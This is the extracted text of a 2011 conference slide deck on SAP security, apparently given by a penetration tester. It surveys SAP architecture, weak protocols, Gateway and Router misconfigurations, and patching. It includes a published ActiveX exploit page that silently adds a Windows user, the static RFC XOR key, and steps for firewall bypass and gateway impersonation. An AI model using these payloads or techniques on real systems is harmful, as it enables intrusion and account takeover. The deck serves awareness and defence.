Chris John Riley Raiffeisen Informatik GmbH - FH St. Pitsecx.fhstp.ac.at/downloads_2011/04_Riley.pdf · SAP (in)security – FH St.Pölten Chris John Riley, Raiffeisen Informatik

SAP (in)security Chris John Riley

Raiffeisen Informatik GmbH

Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 2 SAP (in)security – FH St.Pölten

English (That was obvious really)

Network and Web-App Penetration Tester

Working for Raiffeisen Informatik Security Competence Center in Zwettl

13+ years working in IT (unlucky 13 ?)

A bit of everything really… „Jack of all trades“

Still learning something new everyday

As we all should!

Blogger and Twitterer (is that even a word ?) Bloger (http://blog.c22.cc)

Twitterer (@ChrisJohnRiley)

Podcaster (Eurotrash Security Podcast - NSFW)

world$whoami

Chris John Riley

„The wisest man is he who knows that he knows nothing"


What we’ll cover today

SAP Basics

SAP Architecture

SAP Components

SAP Threats / Attacks

SAP Conclusions


2. SAP Architecture

3. SAP Components

1. SAP BASICS

4. SAP Threats / Attacks

5. SAP Conclusions



What is SAP?

“…the world's leading provider of

business software, SAP (which stands

for "Systems, Applications, and

Products in Data Processing") delivers

products and services that help

accelerate business innovation for our

customers.”

source: sap.com


SAP Offerings

ERP

(Enterprise Resource Planning)

CRM

(Customer Relationship Management)

SCM

(Supply Chain Management)

PLM

(Product Life-cycle Management)

SRM

(Supplier Relationship Management)

GRC

(Governance, Risk and Compliance)

What is SAP?


What is SAP?

Customers in 120 countries

More than 100,000 clients worldwide

More than 40,000 employees

More than 140,000 SAP implementations

Covering every possibly industry

From Automotive

To Wholesale Distribution


source: sap.com


What is SAP?

Growing target, despite it’s complexity

Holds the keys to the kingdom

Financial data

Personal data

Client data

Business workflows

…

Surely such an important system must be secured!

RIGHT?


Source: h-online.com


2010 Patches

2010: SAP releases more than 900 fixes Large complex systems will always have configuration issues

Vulnerabilities per line of code?

*Industry Average: “~15 - 50 errors per 1000 lines of delivered code"

Code Execution

Buffer Overflows

Cross-Site Scripting

….

*source: "Code Complete" by Steve McConnell


2. SAP Architecture

3. SAP Components

1. SAP BASICS


5. SAP Conclusions


SAP Architecture

SAP R/3 (ABAP)

mySAP Netweaver (JAVA/ABAP)

– Three Tier Client/Server arch.

Presentation Server

Application Server

Database Server


PRD

QAS

DEV

RFC

RF

C

DIAG

HTTP/

HTTPS

mySAP

Ext. Customer

Ext. Server

SAP Building Blocks


SAP Building Blocks


SAP Building Blocks

SAP DATABASE

SERVER

Clients

000 | SAPR | Default


066 | EARLY | Default

500 | CLIENT1 | CUST




QAS

DEV

PRD

RFC

RF

C

DIAG

HTTP/

HTTPS

mySAP

Ext. Customer

Ext. Server

SAP Building Blocks


QAS

DEV

PRD

RFC

RF

C

DIAG

HTTP/

HTTPS

mySAP

Ext. Customer

Ext. Server

SAP Building Blocks


SAP Building Blocks

Connection protocols

DIAG

Client Connection – SAPGUI

RFC

Server to Server Connection

HTTP/HTTPS

WEBGUI

WebServices (Agate/Wgate/ITS)

Database

TNS Listener (Oracle)

JDBC

….


DIAG

Used for SAPGUI connections

Connections on port 32<instance> (e.g. 3200)

Proprietary Protocol

Supports some RFC request types (sRFC)

Compressed

Non-standard compression

Decompression tools available

Basically, clear-text!


RFC

Used for Server connections

Most used SAP protocol

Proprietary Protocol

Different Types of RFC communications

Synchronous (sRFC)

Asynchronous (aRFC)

Transactional (tRFC)

Queued (qRFC)


RFC

Helpful API released by SAP (rfcsdk)

Supports ext. clients / servers

Traffic is encrypted*

SAP offers SNC encryption at a cost!

Key = [0x96, 0xde, 0x51, 0x1e, 0x74, 0xe, 0x9, 0x9, 0x4, 0x1b, 0xd9,

0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0xb, 0xa0, 0xdd,

0xd6, 0xf5, 0x21, 0x32, 0xf, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,

0x75, 0x54, 0x86, 0x3a, 0xbb]

* Traffic is XOR’d with a static key That was a good idea

Basically clear-text!


SNC

SAP’s solution to the unencrypted communications of

DIAG/RFC

Provides integrity and/or privacy

External product

Naturally… it’s an add-on ($$$)

Not simple to implement (PKI?)

After thought?


SAP Teched 2011

r


2. SAP Architecture

3. SAP Components

1. SAP BASICS


5. SAP Conclusions


SAP Gateway

Handles ALL CPIC/RFC communications

Communications between SAP systems

Communications between SAP and External systems

Works in 2 modes

Started Mode

Application Server Starts on demand

Connection is closed after operation completes

Registered Mode

External server registers itself at the Gateway

Program ID (TPNAME) used to identify connection

External server connection remains open


SAP Gateway

Round-Robin / Load Balancing support

Multiple servers can register as the same ID (TPNAME)

Service is locked while a request is being handled

Remote server can perform connectbacks to client

While a client is connected, the remote server can instruct them to

perform actions on other SAP servers

Default SAP configuration

No auth required

Anybody can register

Not usually web accessible

At least, that‘s what I thought! SAP SERVER

SAP

GATEWAY

SER1

SER_EXT


SAP Gateway

* source: http://sap.com


SAP Router

SAP version of a reverse proxy

Designed to analyze / restrict SAP network traffic that is passed through

the firewall

Sits on the perimeter (internet accessible!)

Listens on port 3299/tcp

Filters based on IP address / protocol

Logs activity

Enforces password security / SNC

Syntax: /H/host/S/service/W/password

Not all parameters are required

(/S/, /W/ are optional)


SAP Router

source: http://help.sap.com

Official SAP Router Diagram


SAP Router

Why would you want to do that!

Connections from external partners

Remote Administration

Internal staff

Required for SAP AG (mandatory)

Monitoring

Troubleshooting

…


SAP Router - saprouttab

Example:

D 192.168.0.1 192.168.0.200 servicex

P 192.168.1.1 192.168.0.200 3300 passwd

S 192.168.2.2 192.168.0.200 * sappwd

KP * 192.168.0.200 4444

....

First-match / Deny on no match D – Deny

P – Permit

S – Permit SAP Protocol only

Kx – Force SNC (e.g KP, KS)


SAP Router

Example (realistic):

saprouttab

----------------------------------------------------------------------------------

P * * *

----------------------------------------------------------------------------------

Permit any/any

Well it works!


SAP Router (New)

Permit any/any still works (but not for everything)

* in the service field no long means ANY

* Excludes non-SAP services

This means no more firewall bypasses!

… or does it!

Commonly seen examples:

P 10.*.*.* * 3389 #Remote Desktop Protocol

P 10.1.*.* 10.2.*.* 5601 #PcAnywhere

P * * telnet


SAP Web Dispatcher

Acts as a reverse proxy / load balancer for HTTP(S) requests

Load Balancing, selecting the appropriate Application Server

Sits on the perimeter

Hides internal infrastructure

Filters URLs

Implements SSL in 2 modes

end-to-end – Connections forwarded without decryption

SSL Terminator – Connections decrypted to the dispatcher


SAP ITS / ICM

ITS (Internet Transaction Server)

Enables Web Access to SAP Applictions

Translates Dialog screens into HTML

SAPGUI for the Internet!

ICM (Internet Communication Manager)

Direct access to SAP Application Server through HTTP(S) / SMTP

Unlike ITS, users don‘t need to interact with middleware

Requests handled directly by the Web Application Server

SAP in the Internet age!

Now even China can see your customer list!


SAP WebServices

SAP Management Consoles communication channel

Communicates over port 5<instance>13/14 (e.g. 50013)

Can use SSL for transport encryption

Port 50014

Uses BASIC auth for some functions

Windows:

MMC Plug-in, uses SOAP requests in the background

*nix:

JAVA Applet, uses SOAP requests in the background



The B!G picture

How often are these ports open to the world?

AKA: Scanning a small country

Ports 3299, 3300, 50013, 50014

SYN scan only

We don‘t want to connect to them after all!


2570

2580

2590

2600

2610

2620

2630

2640

2650

2660

SAP Ports Austria

SAP Router

(3299)

SAP Gateway

(3300)

SAP MC

SAP MC (SSL)


2. SAP Architecture

3. SAP Components

1. SAP BASICS


5. SAP Conclusions


Drinking from the firehose

of information technology


CWE-319*: Cleartext Transmission of Sensitive

Information

RFC – XOR (CWE-321*: Use of Hard-coded Cryptographic Key)

DIAG – Encoded/Compressed

SOAP over HTTP

ICM/IST over HTTP

Usage of SSL / SNC optional

Costs

Costs

* (http://cwe.mitre.org)

What we’ve already seen

PRD

QAS

DEV

RFC

RF

C

DIAG

HTTP/

HTTPS

mySAP

Ext. Customer

Ext. Server


What we’ve already seen (SAPGUI)

Attacks

• Man in the Middle

• Replay Attacks

• Sniffing (usernames, passwords)


What we’ve already seen (SAP Database)

No seperation of client data

All Client data is stored in the same Database

One hack to rule them all!

Developers can run direct SQL queries

Attacks can gain access through one client and access ALL data

No valid seperation of permissions on the DB

SAP SERVER

Clients



066 | EARLY | Default




Attacks

• Exposure of client data

• Command injection through DB


What we’ve already seen (ORACLE)

Oracle Database

Have you heard of OSAUTHENT?

Remote OS Authentication (sounds harmless)

Trusts the remote system to perform authentication!

OPS$

Connection Example:

1. User logged into remote system as sapadm

2. Connects to Oracle TNS Listener (port 1521)

3. User says „I‘m authenticated on my system as sapadm“

4. Oracle server replies „Yes sir! Welcome sapadm“

5. Profit!


What we’ve already seen (ORACLE)

Oracle Database

It‘s ok though, you can turn that feature off

remote_os_authent = false

As long as you set the username / password to a static value

SAPR3:PASS

Attacks

• Complete SAP DB access

• NO PASSWORD REQUIRED!


What we’ve already seen (SAP Gateway)

SAP Gateway Registration

Remote systems register themselves with the SAP server

What would happen if an attacker registers?

No authentication by default

Anybody can be a server!

SAP SERVER

SAP

GATEWAY

SER1

ATTACKER1


SAP Gateway - Exploitation

Attacks

• Evil Twin / Man in the Middle

• Denial of Service SAP SERVER

SAP

GATEWAY

SER1

REG AS

SER1

BLOCKED

IN-USE

1. Attacker connects to the existing registered server (ID=SER1)

2. By maintaining this connection the registered server is blocked

3. Attacker registers themselves on the gateway as ID=SER1 also

4. Wait for connections from clients/servers

5. Profit!


What we’ve already seen (RFC)

Many other issues with RFC

Insecure functions

RFC_DOCU

RFC_PING

RFC_SYSTEM_INFO

RFCEXEC

Buffer Overflows

….

Attacks

• Lack of authentication on RFC functions

• Exposure of information

• Command injection


What we’ve already seen (SAP Router)

SAP Router

Designed to route traffic

Why not take advantage of those ANY:ANY rules to bypass the firewall

Connect through the SAProuter port using tsocks

Attack the weak underbelly of the server!

Attacks

• Firewall Bypass ATTACKER

TCP 1521

TCP 1521

ORACLE

DBRFC ROUTED

SAP SERVER

SAP

ROUTER

ROUTED


What we’ve already seen (Client-Side)

Patching Client-Side Applications it still a problem

Often no central management

Why patch it if it works!

Client-Side ActiveX

SAPGUI

Lots of Client-Side exploits public

Some very simple to exploit

Attacks

• Client-Side Code Execution

• Web-Based Exploitation (ActiveX)


Client-Side ActiveX – Exploit Example

<html>

<title>*DSecRG* Add user *DSecRG*</title>

<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344"

id='DH'></object>

<script language='Javascript'>

function init()

{ DH.Execute("net.exe","user don_huan p4ssW0rd

/add","d:\\windows\\",1,"",1);}

init();

</script>

</html>


Current Research

WebServices (Management Console)

SOAP requests, many unauthenticated

Enabled by default on ALL SAP systems

Lots of interesting peice of information for an attacker

Data extraction Surely there‘s nothing useful here!


Current Research


Unauthenticated access to :

SAP Version information (down to patch level)

SAP Startup profile

SAP Instance properties

System environment variables

List SAP logfiles

Download / View complete logfiles

Including username information


Current Research


Automate the extraction of data with Metasploit*

source: http://blog.c22.cc

Attacks

• Information Disclosure

• Extraction of Usernames

• SAP Instance information

• Extract Version information

• OSexecute


WebService - Version Information

…

[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel

[+] [SAP] SID: NSP


WebService – Start Profile

[+] SAPSYSTEMNAME – NSP

[+] SAPGLOBALHOST – WINXPSAP-TST

[+] SAPSYTEM – 00

[+] INSTANCE_NAME – DVEBMGS00

…


WebService – Instance / Environment

[+] SAP SYSTEM NUMBER: 00

[+] SAP SYSTEM NAME: NSP

[+] ICM URL: HTTP://WINXPSAP-TST/ICM

[+] DATABASE: Database-SAPDB

…

[+] COMPUTERNAME=WINXPSAPTST

[+] PATH: …

[+] PROCESSOR ARCHITECTURE =x86

…


WebService – Log Files

Information Disclosure

• SAP Status

• Startup Times

• PID

• Errors

• Debug data

• …


WebService – Log Files (extract users)

Information Disclosure

• Usernames

• Lockout information

• …


SAP Management Console

Goldmine of information

As we‘ve seen

The present that keeps on giving!

But there‘s more…

Ability to brute-force passwords

Output a FULL configuration!

Execute commands on the remote server

Gain shell access

…


2. SAP Architecture

3. SAP Components

1. SAP BASICS


5. SAP Conclusions


Conclusions

Historical SAP Security

Seperation of privileges

Developer access checks

Debug permissions

Password policies

ABAP code security


Conclusions

The new School

Infrastructure attacks

Database vulnerabilties

Buffer overflows (saplpd, ...)

Web Application vulnerabilities

XSS

CSRF

Attacks against the clients

SAPGUI

ActiveX components


Conclusions

SAP – The new hottness

Blackhat DC / Las Vegas

DefCon

Troopers

DeepSEC

Blackhat EU

BSides

….

SAP Presentations are the new black!


Patching SAP

Patches are released monthly

To coincide with MS patch Tuesday

Very limited information sharing outside of acknowledgments

Note

• Imagine running that process for 500 patches!

• Don’t forget to patch the OS, DB, clients

• Not a simple prospect!


Patching SAP (server)

Applying patches

Download each patch from SAP (registration required)

Apply to DEV/QA systems using SPAM (SAP Patch Manager)

Perform required testing

Schedule downtime

All users must be logged off during update process

Apply to PROD using SPAM

Perform required testing


Patching SAP (custom code)

Patching troubles

Often patches break existing functionality/code

3rd Party patching solutions available

Panaya - SAP Upgrade Automation

Analyses custom code

Tells you what could break!


Patching SAP (client)

Regular patches to correct client-side security flaws

Supported in PSI/CSI*

Simple central rollout

Often forgotten!

* Limited information on secunia website


Hardening?

Searching for „hardening“ on the SAP site results in documents dating from ~2006

Other results including people requesting hardening guidance

SAP Hardening guides

SAP hardening and patch management guide for Windows server http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/31d3e9ef-0c01-0010-01b8-8fbf154c0aca

Last updated 08 August 2008

help.sap.com Range of (mostly business) best practise guides

Best practice / Secure programming references

Some limited security documentation

http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/31d3e9ef-0c01-0010-01b8-8fbf154c0aca










Conclusions

This presentation only scratches the

surface

SAP released more than 900 fixes in 2010

Large complex system

Many bugs yet to be discovered!

SAP has become, and will remain a prime

target for attackers

All the good stuff in one place

Keys to the kingdom

Bad patching practices

If it‘s not broken don‘t fix it

Never touch a running system

Lack of information from SAP


Questions?

Comments?

Abuse!


Thank you for your attention!

Raiffeisen Informatik GmbH

Lilienbrunngasse 7-9

A-1020 Wien

T +43 1/99 3 99 - 0

F +43 1/99 3 99 - 1100

E [email protected]

www.raiffeiseninformatik.at

Documents

Chris John Riley Raiffeisen Informatik GmbH - FH St. Pitsecx.fhstp.ac.at/downloads_2011/04_Riley.pdf · SAP (in)security – FH St.Pölten Chris John Riley, Raiffeisen Informatik